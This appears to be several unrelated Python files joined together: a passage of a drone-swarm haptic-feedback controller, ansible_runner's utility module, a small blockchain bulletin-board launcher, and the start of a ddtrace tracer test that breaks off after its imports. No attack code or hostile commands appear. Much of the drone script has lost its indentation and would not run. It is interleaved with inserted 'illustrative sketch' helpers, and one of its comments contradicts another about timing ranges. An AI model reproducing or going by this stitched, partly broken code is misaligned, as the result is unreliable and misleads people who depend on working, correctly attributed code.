pattern_duration = Send(P11)
patter_publisher('contracted_right')
if contracted and move_left:
print 'pattern contracted LEFT'
pattern_duration = Send(P12)
patter_publisher('contracted_left')
if contracted or extended:
prev_pattern_time = time.time()
# # Patterns manager
# if default_area*0.80<PolyArea(x,y)<default_area*1.20:
# area_pattern = False
# else:
# area_pattern = True
# centroid = centroid_calc(drone1, drone2, drone3)
# if -0.02<(centroid[1] - human.pose[1])<0.02:
# left_right_pattern = False
# else:
# left_right_pattern = True
# # a=1, lr=1
# if area_pattern and left_right_pattern:
# if prev_pattern == "area_pattern":
# # Start left_right pattern
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# prev_pattern = 'left_right_pattern'
# else:
# # Start area pattern
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# prev_pattern = "area_pattern"
# # a=1 lr=0, a=0 lr=1
# if area_pattern and not left_right_pattern:
# # Start area pattern
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# if left_right_pattern and not area_pattern:
# # Start left_right pattern
# # print "only left_right_pattern"
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# centroid = centroid_calc(drone1, drone2, drone3)
# if (centroid[1] - human.pose[1])>0.02:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
def extended_pattern():
    # 1st column is intensity levels between 0-9
    # 2nd column is timing between 0-9
    timing = 4  # local name avoids shadowing the `time` module
    C = np.array([
        [9, timing],
        [0, timing],
        [0, timing],
        [0, timing],
        [8, timing]])
    P = []
    P.append(np.copy(C))
    pattern_duration = Send(P)
    return pattern_duration
def contracted_pattern():
    # 1st column is intensity levels between 0-9
    # 2nd column is timing between 0-999
    timing = 3
    C = np.array([
        [0, timing],
        [0, timing],
        [9, timing],
        [0, timing],
        [0, timing]])
    P = []
    P.append(np.copy(C))
    pattern_duration = Send(P)
    return pattern_duration
def too_contracted_pattern():
    # 1st column is intensity levels between 0-9
    # 2nd column is timing between 0-999
    timing = 5
    C = np.array([
        [0, timing],
        [9, timing],
        [9, timing],
        [9, timing],
        [0, timing]])
    P = []
    P.append(np.copy(C))
    pattern_duration = Send(P)
    return pattern_duration
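# Illustrative sketch (not part of the original script): it shows how a single
# 5x2 intensity/timing frame is laid out and how its nominal duration would be
# derived the same way Send() does (longest timing in the frame * 100 ms),
# assuming numpy is imported as np at the top of this script, as the pattern
# helpers above already require. The name _example_frame_duration is hypothetical.
def _example_frame_duration():
    timing = 4
    frame = np.array([
        [9, timing],   # motor 1 at full intensity
        [0, timing],
        [0, timing],
        [0, timing],
        [8, timing]])  # motor 5 slightly weaker
    duration_s = np.amax(frame[:, 1]) * 100 / 1000.0  # same scaling as Send()
    return frame, duration_s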
F = np.array([  # 5,7,9
    [high_lev, duration],
    [0, duration],
    [0, duration],
    [0, duration],
    [0, duration]])
F1 = np.array([
    [0, duration],
    [0, duration],
    [high_lev, duration],
    [0, duration],
    [0, duration]])
F2 = np.array([
    [0, duration],
    [0, duration],
    [0, duration],
    [0, duration],
    [high_lev, duration]])
F_ = np.array([
    [0, duration],
    [high_lev, duration],
    [0, duration],
    [0, duration],
    [0, duration]])
F__ = np.array([
    [0, duration],
    [0, duration],
    [0, duration],
    [high_lev, duration],
    [0, duration]])
def right_pattern():
P7=[]
P7.append(np.copy(F))
P7.append(np.copy(empty))#P7.append(np.copy(F_))
P7.append(np.copy(F1))
P7.append(np.copy(empty))#P7.append(np.copy(F__))
P7.append(np.copy(F2))
pattern_duration = Send(P7)
return pattern_duration
def left_pattern():
P8=[]
P8.append(np.copy(F2))
P8.append(np.copy(empty))#P8.append(np.copy(F__))
P8.append(np.copy(F1))
P8.append(np.copy(empty))#P8.append(np.copy(F_))
P8.append(np.copy(F))
pattern_duration = Send(P8)
return pattern_duration
def startXbee():
global serial_port
# serial_port = serial.Serial('/dev/ttyUSB0', 9600)
serial_port = serial.Serial('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_956353330313512012D0-if00', 9600)
def Send(Mat):
    # Total pattern time in ms: the longest timing value of each frame, scaled by 100.
    total_ms = 0.0
    for i in range(len(Mat)):
        total_ms += np.amax(Mat[i][:, 1]) * 100
    # Note: this assignment creates a local handle only; matrix_send() below
    # still writes to the module-level serial_port opened by startXbee().
    serial_port = serial.Serial('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_956353330313512012D0-if00', 9600)
    t = matrix_send(Mat)
    serial_port.close()
    t2 = (total_ms / 1000.0) + t
    return t2
def matrix_send(Matr):
    # Blank frame (all motors off) used to pad the transmission to 5 frames.
    X = np.array([
        [0, 0],
        [0, 0],
        [0, 0],
        [0, 0],
        [0, 0]])
    matrix = np.copy(Matr)
    for i in range(len(matrix)):
        Z = np.copy(matrix[i])
        # Intensities first, then timings, one '%s\r' token per value.
        for k in range(len(Z)):
            item = '%s\r' % Z[k][0]
            serial_port.write(item.encode())
        for n in range(len(Z)):
            item = '%s\r' % Z[n][1]
            serial_port.write(item.encode())
    for i in range(5 - len(matrix)):
        Z = np.copy(X)
        for k in range(len(Z)):
            item = '%s\r' % Z[k][0]
            serial_port.write(item.encode())
        for n in range(len(Z)):
            item = '%s\r' % Z[n][1]
            serial_port.write(item.encode())
    return 0.1 * (5 - len(matrix))
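# Illustrative sketch (not part of the original script): it reproduces the
# framing used by matrix_send() -- one '%s\r' token per intensity value, then
# one per timing value -- but collects the encoded bytes in a list instead of
# writing to the Xbee serial port, so it runs without hardware. The class name
# _FakeSerial and the function name _example_framing are hypothetical.
def _example_framing():
    class _FakeSerial(object):
        def __init__(self):
            self.sent = []
        def write(self, data):
            self.sent.append(data)
    port = _FakeSerial()
    frame = np.array([[9, 4], [0, 4], [0, 4], [0, 4], [8, 4]])
    for value in frame[:, 0]:          # intensities first
        port.write(('%s\r' % value).encode())
    for value in frame[:, 1]:          # then timings
        port.write(('%s\r' % value).encode())
    return port.sent                   # 10 tokens for a single frame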
def recorder(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on):
if tacile_glove_on:
user_name = user_name+'_with_glove'
else:
user_name = user_name+'_wo_glove'
obstacle_topics = ''
for i in range(len(obstacle_list)):
obstacle_topics = obstacle_topics +" /vicon/"+obstacle_list[i]+"/"+obstacle_list[i]
os.system("rosbag record -o /home/drone/SwarmTouchData/"+user_name+" /vicon/"+cf1_name+"/"+cf1_name+" /vicon/"+cf2_name+"/"+cf2_name+" /vicon/"+cf3_name+"/"+cf3_name+" /vicon/"+human_name+"/"+human_name+obstacle_topics+" /"+cf1_name+"_sp"+" /"+cf2_name+"_sp"+" /"+cf3_name+"_sp"+' /pattern_topic')
# os.system("rosbag record -o /home/drone/SwarmTouchData/"+user_name + " -a")
# os.system("rosbag record -a")
def start_recording(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on):
pose_recording = Process(target=recorder, args=(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on,))
pose_recording.start()
def killer_of_recorder():
    print('killing the recorder')
    node_list = os.popen("rosnode list").read()
    print(node_list)
    for i in range(len(node_list)):
        if node_list[i:i+5] == '/reco':
            # The recorder node name is assumed to span 27 characters.
            os.system('rosnode kill ' + node_list[i:i + 27])
            break
# IMPEDANCE ####################################################################################
# OBJECT VELOCITY CALCULATION
time_array = np.ones(10)
pose_array = np.array([ np.ones(10), np.ones(10), np.ones(10) ])
def velocity(pose):
for i in range(len(time_array)-1):
time_array[i] = time_array[i+1]
time_array[-1] = time.time()
for i in range(len(pose_array[0])-1):
pose_array[0][i] = pose_array[0][i+1]
pose_array[1][i] = pose_array[1][i+1]
pose_array[2][i] = pose_array[2][i+1]
pose_array[0][-1] = pose[0]
pose_array[1][-1] = pose[1]
pose_array[2][-1] = pose[2]
vel_x = (pose_array[0][-1]-pose_array[0][0])/(time_array[-1]-time_array[0])
vel_y = (pose_array[1][-1]-pose_array[1][0])/(time_array[-1]-time_array[0])
vel_z = (pose_array[2][-1]-pose_array[2][0])/(time_array[-1]-time_array[0])
vel = np.array( [vel_x, vel_y, vel_z] )
return vel
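# Illustrative sketch (not part of the original script): a self-contained
# version of the same sliding-window finite difference used by velocity()
# above, with the timestamp/position window passed in explicitly instead of
# kept in module-level arrays. Assumes numpy imported as np; the name
# _example_finite_difference_velocity is hypothetical.
def _example_finite_difference_velocity(times, poses):
    # times: 1-D sequence of timestamps; poses: (N, 3) sequence of positions.
    times = np.asarray(times, dtype=float)
    poses = np.asarray(poses, dtype=float)
    dt = times[-1] - times[0]
    return (poses[-1] - poses[0]) / dt  # average velocity over the window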
# HUMAN IMPEDANCE
def MassSpringDamper(state,t,F):
x = state[0]
xd = state[1]
m = 2.0 # Kilograms
b = 12.6
k = 20.0 # Newtons per meter
xdd = -(b/m)*xd - (k/m)*x + F/m
return [xd, xdd]
def impedance_human(hum_vel, imp_pose_prev, imp_vel_prev, time_prev):
F_coeff = 12 # 7
time_step = time.time() - time_prev
time_prev = time.time()
t = [0. , time_step]
if hum_vel[0]<0:
hum_vel[0] = - hum_vel[0]
F = - hum_vel * F_coeff
state0_x = [imp_pose_prev[0], imp_vel_prev[0]]
state_x = odeint(MassSpringDamper, state0_x, t, args=(F[0],))
state_x = state_x[1]
state0_y = [imp_pose_prev[1], imp_vel_prev[1]]
state_y = odeint(MassSpringDamper, state0_y, t, args=(F[1],))
state_y = state_y[1]
state0_z = [imp_pose_prev[2], imp_vel_prev[2]]
state_z = odeint(MassSpringDamper, state0_z, t, args=(F[2],))
state_z = state_z[1]
imp_pose = np.array( [state_x[0], state_y[0], state_z[0]] )
imp_vel = np.array( [state_x[1], state_y[1], state_z[1]] )
return imp_pose, imp_vel, time_prev
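# Illustrative sketch (not part of the original script): it integrates the same
# mass-spring-damper model as MassSpringDamper() above over a longer horizon to
# show the step response to a constant force, assuming scipy's odeint is
# imported at the top of this file (impedance_human() already relies on it).
# The name _example_msd_step_response is hypothetical.
def _example_msd_step_response(force=1.0, horizon=2.0, steps=200):
    t = np.linspace(0.0, horizon, steps)
    states = odeint(MassSpringDamper, [0.0, 0.0], t, args=(force,))
    # states[:, 0] is the virtual mass position, states[:, 1] its velocity.
    return t, states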
def MassSpringDamper_rad_imp(state,t,F):
x = state[0]
xd = state[1]
m = 2.0 # Kilograms
b = 20.0
k = 20.0 # Newtons per meter
xdd = -(b/m)*xd - (k/m)*x + F/m
return [xd, xdd]
# Radius OBSTACLE IMPEDANCE
def radius_obstacle_impedance(drone):
F_coeff = 12 # 7
time_step = time.time() - drone.rad_imp.time_prev
drone.rad_imp.time_prev = time.time()
t = [0. , time_step]
F = np.linalg.norm(drone.rad_imp.penetration) * F_coeff
state0 = [drone.rad_imp.imp_pose, drone.rad_imp.imp_vel]
state = odeint(MassSpringDamper_rad_imp, state0, t, args=(F,))
state = state[1]
imp_pose = state[0]
imp_vel = state[1]
drone.rad_imp.imp_pose = imp_pose
drone.rad_imp.imp_vel = imp_vel
    # step toward the center (TODO: clean this up)
v = - drone.sp[:2] + drone.nearest_obstacle.pose[:2]
v = v/np.linalg.norm(v)
v = v*drone.rad_imp.imp_pose
drone.sp[0] = drone.sp[0] + v[0]
drone.sp[1] = drone.sp[1] + v[1]
return drone
def pub_circle_traj(x0,y0,z0,r,i):
# i=0
# while time_delay<delay:
x1 = x0 + r*sin(i*1.75*pi/360) # 1
y1 = y0 + r*cos(i*1.75*pi/360) # 1
z1 = z0
drone10_pose_goal = np.array([ x1,y1,z1 ])
x2 = x0 + r*sin(i*1.75*pi/360+pi) # 2
y2 = y0 + r*cos(i*1.75*pi/360+pi) # 2
z2 = z0
drone11_pose_goal = np.array([ x2,y2,z2 ])
i = i+1
publish_pose(drone10_pose_goal, 0, "drone10_pose_goal")
publish_pose(drone11_pose_goal, 0, "drone11_pose_goal")
return i, drone10_pose_goal, drone11_pose_goal
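# Illustrative sketch (not part of the original script): the two goals produced
# by pub_circle_traj() are antipodal points on a circle of radius r around
# (x0, y0); this helper just computes them without publishing to ROS. Assumes
# sin, cos and pi are imported from math as pub_circle_traj() above requires.
# The name _example_circle_points is hypothetical.
def _example_circle_points(x0, y0, z0, r, i):
    angle = i * 1.75 * pi / 360
    p1 = np.array([x0 + r * sin(angle), y0 + r * cos(angle), z0])
    p2 = np.array([x0 + r * sin(angle + pi), y0 + r * cos(angle + pi), z0])
    return p1, p2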
|
__init__.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
from distutils.spawn import find_executable
from ansible_runner.exceptions import ConfigurationError
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
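# Illustrative usage sketch (not part of the original module): Bunch simply
# exposes keyword arguments as attributes/dict entries, which is how the rest
# of ansible_runner passes loose configuration around. The name _example_bunch
# is hypothetical.
def _example_bunch():
    cfg = Bunch(private_data_dir='/tmp/demo', quiet=True)
    assert cfg.get('quiet') is True
    cfg.update(quiet=False)
    return cfg.get('quiet')  # False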
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
        boolean: True if the object looks like a playbook (a non-string, non-mapping iterable), False otherwise
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
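# Illustrative usage sketch (not part of the original module): shows how the
# two predicates classify typical inputs -- a playbook is a non-string,
# non-mapping iterable (e.g. a list of plays), an inventory is either a mapping
# or a string path/INI blob. The name _example_predicates is hypothetical.
def _example_predicates():
    playbook = [{'hosts': 'all', 'tasks': []}]
    inventory = {'all': {'hosts': {'localhost': None}}}
    return (isplaybook(playbook),      # True
            isplaybook(inventory),     # False (it is a Mapping)
            isinventory(inventory),    # True
            isinventory('hosts.ini'))  # True (string path)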
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
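# Illustrative usage sketch (not part of the original module): dumps a small
# JSON blob into a temporary directory and returns the path that dump_artifact()
# created; it only uses standard-library modules already imported above. The
# name _example_dump_artifact is hypothetical.
def _example_dump_artifact():
    tmp = tempfile.mkdtemp()
    path = dump_artifact(json.dumps({'msg': 'hello'}),
                         os.path.join(tmp, 'env'), 'extravars')
    return path  # .../env/extravars, written read-only for the user (0o400)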
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path, old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys():
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
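# Illustrative usage sketch (not part of the original module): feeding plain,
# non-event-encoded output through OutputEventFilter yields one 'verbose' event
# per complete line plus a final EOF event on close(). StringIO is already
# imported above; the name _example_output_event_filter is hypothetical.
def _example_output_event_filter():
    events = []
    filt = OutputEventFilter(handle=StringIO(), event_callback=events.append,
                             suppress_ansible_output=True)
    filt.write(u'PLAY [all] *********\n')
    filt.write(u'TASK [debug] *******\n')
    filt.close()
    return [e.get('event') for e in events]  # ['verbose', 'verbose', 'EOF']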
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
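# Illustrative usage sketch (not part of the original module): ensure_str()
# normalises both text and bytes to the interpreter's native str type. The
# name _example_ensure_str is hypothetical.
def _example_ensure_str():
    assert ensure_str(u'abc') == 'abc'
    assert ensure_str(b'abc') == 'abc'
    return ensure_str(b'caf\xc3\xa9')  # decoded on Python 3, returned as-is on Python 2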
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
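# Illustrative usage sketch (not part of the original module): characters that
# docker/podman reject in container names are replaced with underscores. The
# name _example_sanitize is hypothetical.
def _example_sanitize():
    return sanitize_container_name('ansible_runner: job #42')  # 'ansible_runner__job__42'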
def cli_mounts():
return [
{
'ENVS': ['SSH_AUTH_SOCK'],
'PATHS': [
{
'src': '{}/.ssh/'.format(os.environ['HOME']),
'dest': '/home/runner/.ssh/'
},
{
'src': '/etc/ssh/ssh_known_hosts',
'dest': '/etc/ssh/ssh_known_hosts'
}
]
},
]
def santize_json_response(data):
'''
    Removes warning messages from the response emitted by ansible
    command line utilities, keeping only the JSON payload.
    :param data: The string data to be sanitized
    :type data: str
'''
start_re = re.compile("{(.|\n)*", re.MULTILINE)
data = start_re.search(data).group().strip()
return data
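# Illustrative usage sketch (not part of the original module): ansible CLI
# tools sometimes prefix their JSON output with warning lines; the regex above
# keeps everything from the first '{' onwards. The name _example_sanitize_json
# is hypothetical.
def _example_sanitize_json():
    raw = '[WARNING]: provided hosts list is empty\n{"changed": false}'
    return santize_json_response(raw)  # '{"changed": false}'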
def get_executable_path(name):
exec_path = find_executable(name)
if exec_path is None:
raise ConfigurationError(f"{name} command not found")
return exec_path
|
blockchain_bbs.py
|
import hashlib
import threading
import os
from blockchain import *
from network import *
from blockchain_constants import *
from time import sleep
def ensure_keys():
"""
Ensures that our public and private keys exist in the folder.
:return: None
"""
if not os.path.exists(PRIVATE_KEY_FILE):
import generate_user_key
def main(threads):
ensure_keys()
blockchain = Blockchain(LEDGER_FILE, MESSAGE_FILE, STATS_FILE)
bchain_threads = []
for i in range(threads):
bchain_threads.append(threading.Thread(target=blockchain.mine))
for thread in bchain_threads:
thread.start()
# blockchain_thread.daemon = True
server = Server(blockchain, True, True, False)
server.run()
# Main thread is server thread
# This call never returns
if __name__ == "__main__":
import sys
threads = 1
if len(sys.argv) > 1:
threads = int(sys.argv[1])
main(threads)
|
test_tracer.py
|
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
from os import getpid
import warnings
from unittest.case import SkipTest
import mock
import pytest
import ddtrace
from ddtrace.ext import system
from ddtrace.context import Context
from ddtrace.constants import VERSION_KEY, ENV_KEY
from tests.subprocesstest import run_in_subprocess
from .base import BaseTracerTestCase
